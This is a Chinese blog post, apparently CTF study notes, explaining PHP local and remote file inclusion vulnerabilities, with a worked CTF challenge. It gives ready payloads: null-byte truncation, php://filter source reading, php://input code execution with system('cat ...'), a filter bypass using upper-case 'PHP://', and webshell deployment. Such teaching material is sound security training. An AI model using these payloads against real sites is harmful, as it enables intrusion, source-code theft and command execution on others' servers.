文件包含漏洞

最新推荐文章于 2023-04-24 18:09:46 发布
最新推荐文章于 2023-04-24 18:09:46 发布
阅读量1k 收藏 2
点赞数 1
文章标签: php
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_63231007/article/details/123619500
版权

定义

在通过PHP的函数引入文件时,由于传入的文件名没有经过合理的校验,从而操作了预想之外的文件,导致意外的文件泄露甚至恶意的代码注入。

危险函数: include() , include_once() , require() , require_once().

解题思路

        本地文件包含: 直接读取目标机上的Flag文件.

        远程文件包含:指定第三方服务器上可运行的PHP木马,拿到webshell,查看Flag文件.

判断本地文件包含与远程文件包含方法:

       查看php全局配置文件php.ini

        1. allow_url_fopen = on/off  允许URLs像files对象一样被打开

        2. allow_url_include = on/off 允许包含URL 对象文件.   才可以使用远程文件包含.

本地文件包含:

<1>直接包含内有Flag的文件.

        利用:http://www.example.com/demo1.php? file=flag.php%00

        这段代码相当于: include '/home/www/flag.php%00.php'

        字符串截断技巧: 结束符的 \x00-->%00.

<2>通过PHP伪协议读取代码中的Flag.

        PHP伪协议:

                  1.file://  访问本地文件系统,在CTF比赛中常用来读取本地文件.

                        用法: file:// [文件的绝对路径和文件名]

                        条件(php.ini) : allow_url_fopen = off/on

                                               allow_url_include = off/on  on off 都可.

                        eg: http://www.example.com/index.php?file=file://D:/PhpStudy/WWW/flag.txt

                  2.php://  访问各个输入/输出流.

                        php://filter

                        用法:读取网页源代码.

                        条件(php.ini) : allow_url_fopen = off/on

                                               allow_url_include = off/on  on off 都可.

                      ini无法获取的话,可以利用:(如果不是base64编码,就会当成php执行,就看不到原码了)

                         file=php://filter/read=convert.base-64-encode/resource=index.php

                         拿burp decode一下,就看见源码了。

                          前面文章buuctf web真题1 里有此例题include。

                        PHP://input

                        用法: 可以访问请求的原始数据的只读流,将post请求中的数据作为PHP代码执行.

                        条件(php.ini) : allow_url_fopen = off/on

                                               allow_url_include = on

                                                只要include 开启,就可以当成php代码执行.

例题:攻防世界 Web_php_include

        通过对网站源码进行分析:

        <?php
        show_source(__FILE__);
        echo $_GET['hello'];    //hello变量接受get传参,可以利用hello显示某些内容
        $page=$_GET['page'];//page变量接受get传参
        while (strstr($page, "php://")) {    //检查page变量中是否含有字符串“php://“
            $page=str_replace("php://", "", $page);    //将page变量中的“php://”用空字符串代替
}
        include($page);//文件包含,可以执行page变量中的代码。
?>

由include($page)看出本题的考点在于文件包含,而且通过源码得知php://被过滤了。

        php://被过滤,strstr函数对大小写不敏感,因此我们可以使用PHP://来绕过。所以我们可以使用php://input 来post传递恶意代码,来输入命令给服务端。

发现了fl4gisisish3r3.php    index.php   phpinfo.php。

再传输一个指令,查询flag。<?php system("cat fl4gisisish3r3.php")?>,得到flag.

<3>写入PHP木马获取webshell,查看Flag.

这个可以直接看见源码的,可以查看一下php.ini,发现include on,fopen off.可用php伪协议

 http://----------/index.php/file=php://input

后通过hackbar post我们的shell。

之后就可以利用菜刀链接shell了。

远程文件包含:

        指定第三方服务器上可运行的php木马,拿到webshell,查看Flag文件。

例如查看源码可看见require_once.

访问php.ini发现,allow_url_fopen 和include都on,存在远程文件包含.

 

葫芦娃42
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
引入flag.php文件,WEB_flag在index里
weixin_28888459的博客
03-10 777
题解:打开题目 点击进去,除了一个test5后什么也没有,但是发现了URL中的地址后缀变化,是典型的文件包含漏洞,file关键字是提示,其实也是CTF的套路 题目标题就说明了,flag在index中,要用到php的封装协议,在文件后缀添加 ?file=php://filter/read=convert.base64-encode/resource=index.php即http://123.206...
引入flag.php文件,flag在php中咋解决
weixin_33982355的博客
03-10 2484
该楼层疑似违规已被系统折叠隐藏此楼查看此楼include("flag.php");highlight_file(__FILE__);class FileHandler {protected $op;protected $filename;protected $content;function __construct() {$op = "1";$filename = "/tmp/tmpfile";...
Web应用安全:文件包含漏洞简介.pptx
06-18
文件包含漏洞简介 文件包含漏洞简介 1、什么是文件包含漏洞? 开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,而无需再次编写,这种调用文件的过程一般被称为包含。 为了使代码更加灵活,通常会将被包含文件设置为变量,用来进行动态调用,但正是由于这种灵活性,从而导致客户端可以调用一个恶意文件,造成文件包含漏洞。 将文件包含漏洞分为两类: 本地文件包含 远程文件包含 文件包含漏洞简介 2、包含漏洞的原理解析 大多数Web语言都支持文件包含操作,其中PHP语言所提供的文件包含功能太强大、太灵活,也就导致文件包含漏洞经常出现在PHP语言中。这里就以PHP语言为例。 PHP中提供了四个文件包含的函数: include( ) 当使用该函数包含文件时,只有代码执行到 include()函数时才将文件包含进来,发生错误时只给出一个警告,继续向下执行 include_once( ) 功能与 Include()相同,区别在于当重复调用同一文件时,程序只调用一次 文件包含漏洞简介 2、包含漏洞的原理解析 require( ) require()与 include()的区别在于
flag就在flag.php,flag就在flag.php中
weixin_39610807的博客
03-11 587
Web1题目地址1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的4.抓包 发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密之后的 在登录成功跳转的那个页面还有一个...
flag就在flag.php中
热门推荐
Peithon的博客
05-13 9万+
Web1 题目地址 1.访问题目存在一个登录界面 2.注册一个用户登录,然后会跳转到另一个界面,会给出一些提示 3.访问flag.php,试试可不可以得到flag 提示admin可以得到flag,然后跳转回登录界面,猜测这和Cookie是有关的 4.抓包 发现在Cookie里有username,而且每一个用户的username是不一样的,后面的值是base64加密...
flag.php
萍水间人的小天地
01-29 1821
写在前面 好吧我承认我是看了别人的wp,目前还很菜 然而我看了wp也不会做。 初探 页面 进去之后是一个什么都点不动的页面。。 然后有提示 hint 联系到可能是SQL注入 于是在URL后面加一个hint参数 http://123.206.87.240:8002/flagphp/?hint=1 得到一串代码: <?php error_reporting(0)...
【CTF整理】WriteUp Bugku flag.php
SunnyCat
10-30 867
WriteUp Bugku flag.php 题目:http://123.206.87.240:8002/flagphp 点击:flag.php 随便输入点击没有反应,右键查看源码,没什么有价值的发现 想到提示hint,将之作为url参数提交试试,出现php代码。 顺序:1、2、3、4、5、 <?php error_reporting(0); include_once("flag.php"); // 1、flag的位置 $cookie = $_COOKIE['ISecer']; //
BugkuCTF(flag.php)
痴人说梦梦中人
03-27 1320
点开发现login根本没用,抓包发现是get请求POST请求要比get安全,大部分涉密数据都用POST请求,如下图: 既然是get请求了,常见套路就是传递参数,正好有提示hint,构造URL如图,获取源码 阅读代码发现,如果get参数为hint,给你展示源码,否则反序列化的$cookie=$KEY时给你flag,再否则还是那个登录页面,仔细看你就会发现下边的$KEY的值是迷惑你的,卵用没得,...
每天一道ctf
whisper921的博客
10-28 822
有这样一行代码
BUU 【ACTF2020 新生赛】Include 1 解题大致思路
半文盲半疯癫重度手机爱好者,世界选社恐大赛第二名。
07-14 1047
1.首先打开靶场环境 看到链接tips 打开tips 2.
通达OA v11.8 getway.php 远程文件包含漏洞.md
09-07
通达OA漏洞合集
08_理论8_文件包含漏洞的原理与实践_20180921
02-10
08_理论8_文件包含漏洞的原理与实践_20180921
PHP 网络开发详解之远程文件包含漏洞
12-18
以下代码(Code)实现了根据浏览器地址栏参数的文件名称包含不同文件的功能。 复制代码 代码如下: <?php $file_name = $_GET[“filename”]; //获得当前文件名 include(“$file_name “); //包含文件 //一些其他...
文件包含总结
weixin_48427966的博客
04-24 566
>、空格、汉字 等字符不符合base64编码的字符范围将被忽略,所以最终被解码出来的的字符就变成 “phpdie” 和 我们传入的$content的值。发现过滤的还是比较多,但是没有过滤: ,那我们就可以使用PHP伪协议就是 这里使用的是 data://text/plain;众所周知,base64编码中只包含64个可打印字符,而PHP在解码base64时,遇到不在其中的字符时,将会跳过这些字符,仅将合法字符组成一个新的字符串进行解码。3、将php和data替换为?4、将php和data替换为?
flag.php--cookie伪造分号必须url编码、unserialize()函数、serialize()
qq_32642035的博客
03-18 342
拿到题目 发现很干净,点击提交不发生流量,源码和header都没有发现线索 回到题目看到提示,提示:hint 题目为flag.php 线索可能有两个,hint参数和flag.php页面 尝试在各个页面通过get和post方式hint参数 发现主页提交参数得到源码 访问flag.php无显示内容 serialize()序列化函数 serialize() 返回字符串,此字符串包含了表示 valu...
【ctfhub】SSRF
qq_61109509的博客
02-20 776
目录 SSRF 知识点:回环地址 内网访问 伪协议读取文件 数字IP Bypass DNS 重绑定 URL Bypass 302跳转 Bypass SSRF 在过滤了一堆中找ip本身 我们不能直接访问pc或moblie,必须通过server操作 直接改包很难,除非有说明是从本地来,否则严格的服务器不能通过改包实现 都是让服务器能够访问本地或者内网环境 知识点:回环地址 127.0.0.1 这是一个最常见的回环地址。 回环地址是什么呢? 回环地址并非只有一...
PHP中flag参数,flag(命令行参数解析flag包)
weixin_39864571的博客
03-21 1231
import "flag"概述索引例子概述Flag 包实现了命令行标志解析。用法:使用 flag.String(),Bool(),Int() 等定义标志。这声明了一个整型 flag,-flagname,都存储在指针 ip 中,类型为 *int 。import"flag"varip=flag.Int("flagname",1234,"helpmessageforflagname")...
Bugku CTF flag.php WriteUp
Ta_ki
03-18 8957
Bugku CTF flag.php WriteUp 原题链接 flag.php 进去后第一反应是SQL注入得到flag,但是发现输入任何特殊字符点击Login都没有反应,查看源代码未发现异样。回到Bugku CTF界面,发现给了一个hint 提示给了一个hint,用户名密码输入hint没有反应,突然想到Get传参,传入参数 120.24.86.145:8002/flagph...
java 文件包含漏洞
最新发布
01-05
Java 文件包含漏洞是指在 Java 程序开发中存在的一种安全漏洞。这种漏洞通常出现在程序中使用了不安全的文件包含函数的情况下。 在 Java 中,文件包含函数可以通过一些方式导入外部文件,比如使用相对路径或绝对路径引用文件。然而,如果程序没有进行充分的输入验证和过滤,攻击者就可以通过构造恶意的输入路径来读取和执行系统的敏感文件。 攻击者可通过 Java 文件包含漏洞执行各种恶意行为,比如读取敏感系统文件、执行命令、修改系统配置等。这种漏洞可能导致系统被攻击者完全控制,破坏系统的安全性或者泄露系统的敏感信息。 为了防止 Java 文件包含漏洞,开发者应当始终对输入进行充分的验证和过滤。可以使用白名单验证,只允许特定的文件路径被导入,或使用安全的文件处理函数。此外,还应当时刻注意监控系统的文件访问情况,及时发现和处理异常文件操作。 对于系统管理员来说,也应当定期更新和修复操作系统和 Java 运行环境的安全漏洞。及时更新和修复可以减少被攻击者利用 Java 文件包含漏洞的风险。 总之,Java 文件包含漏洞是一种常见的安全问题,对系统的安全性和数据的保护造成威胁。开发者和管理员都应当采取相应的措施来预防和修复这种漏洞,以确保系统的安全。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值